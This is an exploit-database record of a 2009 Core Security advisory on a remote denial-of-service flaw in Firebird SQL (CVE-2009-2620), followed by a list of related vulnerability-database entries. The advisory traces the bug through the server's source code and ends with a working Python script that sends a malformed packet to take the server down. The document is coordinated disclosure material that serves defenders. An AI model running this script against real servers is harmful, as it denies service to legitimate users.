{"bulletinFamily": "exploit", "id": "EDB-ID:9295", "cvelist": ["CVE-2009-2620"], "modified": "2009-07-28T00:00:00", "lastseen": "2016-02-01T10:17:10", "edition": 1, "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nFirebird SQL op_connect_request main listener shutdown vulnerability\n\n\n1. *Advisory Information*\n\nTitle: Firebird SQL op_connect_request main listener shutdown vulnerability\nAdvisory ID: CORE-2009-0707\nAdvisory URL: http://www.coresecurity.com/content/firebird-sql-dos\nDate published: 2009-07-28\nDate of last update: 2009-07-28\nVendors contacted: Firebird SQL\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Denial of service (DoS)\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 35842\nCVE Name: CVE-2009-2620\n\n\n3. *Vulnerability Description*\n\nFirebird SQL [1] is an open source relational database management system\noffering many ANSI SQL standard features that runs on Linux, Windows,\nand a variety of Unix platforms.\n\nA remote denial of service vulnerability has been found in Firebird SQL,\nwhich can be exploited by a remote attacker to force the server to close\nthe socket where it is listening for incoming connections and to enter\nan infinite loop, by sending an unexpected 'op_connect_request' message\nwith invalid data to the server.\n\n\n4. *Vulnerable packages*\n\n . Firebird SQL v1.5.5\n . Firebird SQL v2.0.1\n . Firebird SQL v2.0.5\n . Firebird SQL v2.1.1\n . Firebird SQL v2.1.2\n . Firebird SQL v2.1.3 RC1\n . Firebird SQL v2.5.0 Beta 1\n\n\n5. *Non-vulnerable packages*\n\n . Firebird SQL v2.1.3 Release Candidate 2 (estimated release: July 2009)\n . Firebird SQL v2.5 Beta 2 (estimated release: July 2009)\n . Firebird SQL v1.5.6 (estimated release: August 2009)\n . Firebird SQL v2.0.6 (estimated release: October 2009)\n\nPlease build a fresh CVS checkout to have a fixed version sooner.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nThe issue is resolved in all branches of the Firebird SQL repository. It\nis registered in the Firebird SQL bug tracker as:\nhttp://tracker.firebirdsql.org/browse/CORE-2563\n\n\n7. *Credits*\n\nThis vulnerability was discovered and researched by Francisco Falcon\nfrom Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n8.1. *Introduction*\n\nFirebird SQL is an open source relational database management system\noffering many ANSI SQL standard features that runs on Linux, Windows and\na variety of Unix platforms.\n\nA remote denial of service can be triggered by an unauthenticated\nattacker, by sending an unexpected 'op_connect_request' message with\ninvalid data of length greater than or equal to 12 bytes to the server.\n\nInside the server ('src/remote/server.cpp'), the function\n'process_packet2()' processes a packet received from a client. This\nfunction has a 'switch' statement that considers all the possible\nopcodes defined in the protocol (see 'P_OP' enum 'in\nsrc/remote/protocol.h').\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n3404\tP_OP op = receive->p_operation;\n3405\tswitch (op)\n3406\t{\n3407\tcase op_connect:\n\t...\n3426\tcase op_compile:\n\t...\n3430\tcase op_attach:\n\t...\n\n- -----------/\n\n In the case of an 'op_connect_request' packet, the execution flow goes\nto the following 'case' in the 'switch' statement:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n3584\tcase op_connect_request:\n3585\t\taux_request(port, &receive->p_req, sendL);\n3586\t\tbreak;\n\n- -----------/\n\n After calling 'aux_request()' function and executing the 'break'\nstatement, execution lands here:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n3652\tif (port && port->port_state == state_broken) {\n3653\t\tif (!port->port_parent) {\n3654\t\t\tgds__log(\"SERVER/process_packet: broken port, server exiting\");\n3655\t\t\tport->disconnect(sendL, receive);\n3656\t\t\tThreadData::restoreSpecific();\n3657\t\t\treturn false;\n3658\t\t}\n3659\t\tport->disconnect(sendL, receive);\n3660\t\tport = NULL;\n3661\t}\n\n- -----------/\n\n By debugging the 'fbserver.exe' binary when it receives an\n'op_connect_request' packet, we can see that the conditions of the first\n'if' statement are satisfied, but the condition of the second 'if' is\nnot, so execution flow goes to the 'port->disconnect()' call:\n\n/-----------\n\n005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3\n ;port->port_state == state_broken ?\n005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D\n005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0\n ;port->port_parent == 0?\n005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42\n ;this conditional jump is taken\n005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4\n ; ASCII \"SERVER/process_packet: broken port, server exiting\"\n005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86\n005ACE42 |> 53 PUSH EBX\n ; /Arg2\n005ACE43 |. 57 PUSH EDI\n ; |Arg1\n005ACE44 |. 8BCE MOV ECX,ESI\n ; |\n005ACE46 |. E8 65D7FFFF CALL <fbserver.rem_port::disconnect>\n ; \\port->disconnect(sendL, receive)\n\n- -----------/\n\n The type of 'port' is 'struct rem_port', as defined in\n'src/remote/remote.h'. This struct type has a 'disconnect()' function\nthat is implemented in 'src/remote/server.cpp':\n\n/-----------\n\nsrc/remote/server.cpp:\n\n1464\tvoid rem_port::disconnect(PACKET* sendL, PACKET* receiveL)\n\n- -----------/\n\n Inside this function, the following code is executed, in order to free\nboth the sent and received packets and to close the corresponding sockets:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n1492\tREMOTE_free_packet(this, sendL);\n1493\tREMOTE_free_packet(this, receiveL);\n1494\tthis->disconnect();\n\n- -----------/\n\n That call to 'this->disconnect()' will ultimately lead to the\n'disconnect()' function in 'src/remote/inet.cpp'. This function is\nintended to break a remote connection, and receives a 'rem_port'\nstructure as parameter.\n\n/-----------\n\nsrc/remote/inet.cpp:\n\n1731\tstatic void disconnect( rem_port* port)\n1732\t{\n\n- -----------/\n\n In the first place, the function closes the connection established by\nthe client, by calling the 'shutdown' function:\n\n/-----------\n\nsrc/remote/inet.cpp:\n\n...\n1763\tif (port->port_handle && (SOCKET) port->port_handle !=\nINVALID_SOCKET) {\n1764\t\tshutdown((int) port->port_handle, 2);\n1765\t}\n\n- -----------/\n\n After that, as a comment line states, if the current 'rem_port'\nstructure being disconnected is a child of another 'rem_port' structure,\nit recursively calls 'disconnect()' to disconnect the 'rem_port' stored\nat 'port->port_async'. 'port_async' is a member of 'rem_port' struct\nthat describes an asynchronous sibling port.\n\n/-----------\n\nsrc/remote/inet.cpp:\n\n/* If this is a sub-port, unlink it from it's parent */\n...\n1789\trem_port* parent = port->port_parent;\n1790\tif (parent != NULL) {\n1791\t\tif (port->port_async) {\n1792\t\t\tdisconnect(port->port_async);\n1793\t\t\tport->port_async = NULL;\n1794\t\t}\n\n- -----------/\n\n But when that recursive call to 'disconnect()' is made, the\n'port->port_async' passed as parameter to be disconnected corresponds to\nthe main server socket, that is, the socket listening for incoming\nconnections on port 3050/TCP. Once in the recursive call, 'shutdown()'\nand 'closesocket()' functions are invoked, making the server to stop\nlistening on the default port 3050/TCP, thus denying the service to\nlegitimate users.\n\n\n8.2. *Remarks*\n\nAs a side effect, the 'fbserver.exe' process will enter an infinite\nloop, consuming 100% CPU time.\n\nOn Windows platform, in a default installation, Firebird SQL server is\ninstalled as a Windows service, and another service (the Firebird\nGuardian) runs together with the server, in order to automatically\nrestart the 'fbserver.exe' process if it crashes or stops running\nabnormally. However, in this case the Firebird Guardian is unable to\ndetect the denial of service condition, because the server does not\ncrash nor stops running.\n\nIn Firebird SQL 1.5.5 the behavior is different; the server will crash\ninside the 'aux_request()' function in 'src/remote/server.cpp' due to a\nnull pointer dereference, instead of silently shutting down its listener\nport. The problem arises when 'port->port_context' (which has a 'NULL'\nvalue at this point) is loaded into 'rdb' variable and then, at line\n'885', it is used as a pointer without properly checking that it points\nto a valid memory address:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n884\t\trdb = port->port_context;\n885\t\tport->send_response(send, rdb->rdb_id,\n886\t\t\t\tsend->p_resp.p_resp_data.cstr_length, status_vector);\n\n- -----------/\n\n\n\n\n8.3. *Proof of concept*\n\nThe following Python script will trigger the denial of service condition\non Firebird SQL, by sending an 'op_connect_request' packet with invalid\ndata of length greater than or equal to 12 bytes.\n\n\n/-----------\n\nimport socket\nimport time\n\ndef attack(host, port):\n op_connect_request = '\\x35' # Request to establish connection\n\n packet = '\\x00\\x00\\x00' + op_connect_request\n packet += \"A\" * 12 #Invalid data, must be >= 12 bytes\nin order to trigger the DoS\n\n print \"(+) Connecting to the server....\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n print \"(+) Sending op_connect_request packet...\"\n s.send(str(packet))\n s.close()\n print \"(+) op_connect_request packet successfully sent.\"\n\n #Wait 10 seconds and try to connect again to Firebird SQL server, to\ncheck if it's down\n print \"(+) Waiting 10 seconds before trying to reconnect to the\nserver...\"\n time.sleep(10)\n\n try:\n print \"(+) Trying to reconnect...\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.close()\n print \"(!) Something went wrong. The server is still alive.\"\n except socket.error:\n print \"(*) Attack successful. The server is down.\"\n\n\nport = 3050\nhost = '192.168.131.128' #Replace with your target host\nattack(host, port)\n\n- -----------/\n\n\n\n9. *Report Timeline*\n\n. 2009-07-15:\nCore Security Technologies notifies the Firebird team of the vulnerability.\n\n. 2009-07-16:\nFirebird team requests technical details in plaintext.\n\n. 2009-07-16:\nCore sends the advisory draft, including technical details.\n\n. 2009-07-20:\nFirebird team notifies that the issue is resolved in all branches of the\nFirebird repository [2]. Technical details will be publicly visible when\nCore releases its advisory. Firebird team notices that Firebird version\n1.5.5 (marked as non vulnerable in the advisory draft) seems to be\naffected.\n\n. 2009-07-27:\nCore sends the final version of the advisory to the Firebird team.\n\n. 2009-07-28:\nThe advisory CORE-2009-0707 is published.\n\n\n\n10. *References*\n\n[1] http://www.firebirdsql.org\n[2] http://tracker.firebirdsql.org/browse/CORE-2563\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.8 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel\n0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z\n=GgTL\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-07-28]\n", "published": "2009-07-28T00:00:00", "href": "https://www.exploit-db.com/exploits/9295/", "osvdbidlist": ["56606"], "reporter": "Core Security", "hash": "ed350b236950992cc56e230a6018aaec11b4875b74c7d91274cda84274b3ed05", "title": "Firebird SQL op_connect_request main listener shutdown Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Firebird SQL op_connect_request main listener shutdown Vulnerability. CVE-2009-2620. Dos exploit for windows platform", "references": [], "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9295/", "enchantments": {"vulnersScore": 4.1}}

{"result": {"cve": [{"id": "CVE-2009-2620", "type": "cve", "title": "CVE-2009-2620", "description": "src/remote/server.cpp in fbserver.exe in Firebird SQL 1.5 before 1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3, and 2.5 before 2.5 Beta 2 allows remote attackers to cause a denial of service (daemon crash) via a malformed op_connect_request message that triggers an infinite loop or NULL pointer dereference.", "published": "2009-07-29T13:30:01", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2620", "cvelist": ["CVE-2009-2620"], "lastseen": "2016-09-03T12:40:31"}], "openvas": [{"id": "OPENVAS:64529", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:186 (firebird)", "description": "The remote host is missing an update to firebird\nannounced via advisory MDVSA-2009:186.", "published": "2009-08-17T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64529", "cvelist": ["CVE-2009-2620"], "lastseen": "2017-01-25T11:02:02"}, {"id": "OPENVAS:64739", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8317 (firebird)", "description": "The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8317.", "published": "2009-09-02T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64739", "cvelist": ["CVE-2009-2620"], "lastseen": "2016-12-22T10:02:38"}, {"id": "OPENVAS:64742", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8340 (firebird)", "description": "The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8340.", "published": "2009-09-02T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64742", "cvelist": ["CVE-2009-2620"], "lastseen": "2016-12-22T10:02:36"}, {"id": "OPENVAS:800852", "type": "openvas", "title": "Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)", "description": "The host is running Firebird and is prone to Denial of Service\n Vulnerability.", "published": "2009-09-11T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=800852", "cvelist": ["CVE-2009-2620"], "lastseen": "2017-01-08T11:56:58"}], "packetstorm": [{"id": "PACKETSTORM:79720", "type": "packetstorm", "title": "Core Security Technologies Advisory 2009.0707", "description": "", "published": "2009-07-28T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/79720/Core-Security-Technologies-Advisory-2009.0707.html", "cvelist": ["CVE-2009-2620"], "lastseen": "2016-12-05T22:17:20"}], "nessus": [{"id": "FEDORA_2009-8317.NASL", "type": "nessus", "title": "Fedora 10 : firebird-2.1.3.18185.0-2.fc10 (2009-8317)", "description": "Upgrade from previous package version may be a problem since previous version remove /var/run/firebird and it shouldn't This release fix this problem for future updates If you are in that case (no longer /var/run/firebird directory after upgrade), just reinstall firebird-2.1.3.18185.0-2 package or create /var/run/firebird owned by user firebird\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-09-02T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40829", "cvelist": ["CVE-2009-2620"], "lastseen": "2016-09-26T17:25:44"}, {"id": "FEDORA_2009-8340.NASL", "type": "nessus", "title": "Fedora 11 : firebird-2.1.3.18185.0-2.fc11 (2009-8340)", "description": "Upgrade from previous package version may be a problem since previous version remove /var/run/firebird and it shouldn't This release fix this problem for future updates If you are in that case (no longer /var/run/firebird directory after upgrade), just reinstall firebird-2.1.3.18185.0-2 package or create /var/run/firebird owned by user firebird\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-09-02T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40830", "cvelist": ["CVE-2009-2620"], "lastseen": "2016-09-26T17:23:41"}], "kaspersky": [{"id": "KLA10158", "type": "kaspersky", "title": "\r KLA10158\nDoS vulnerability in FireBird\t\t\t ", "description": "### *CVSS*:\n5.0\n\n### *Detect date*:\n07/29/2009\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn unspecified vulnerability was found in FireBird. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited remotely via a specially designed message.\n\n### *Affected products*:\nFireBird SQL 1.5 versions 1.5.5 and earlier \nFireBird SQL 2.0 versions 2.0.5 and earlier \nFireBird SQL 2.1 versions 2.1.2 and earlier \nFireBird SQL 2.5 versions beta 1 and earlier\n\n### *Solution*:\nUpdate to latest version \n[FireBird SQL](<http://www.firebirdsql.org/en/server-packages/>)\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Firebird](<https://threats.kaspersky.com/en/product/Firebird-2/>)\n\n### *CVE-IDS*:\n[CVE-2009-2620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2620>)", "published": "2009-07-29T00:00:00", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10158", "cvelist": ["CVE-2009-2620"], "lastseen": "2017-05-01T09:33:27"}]}}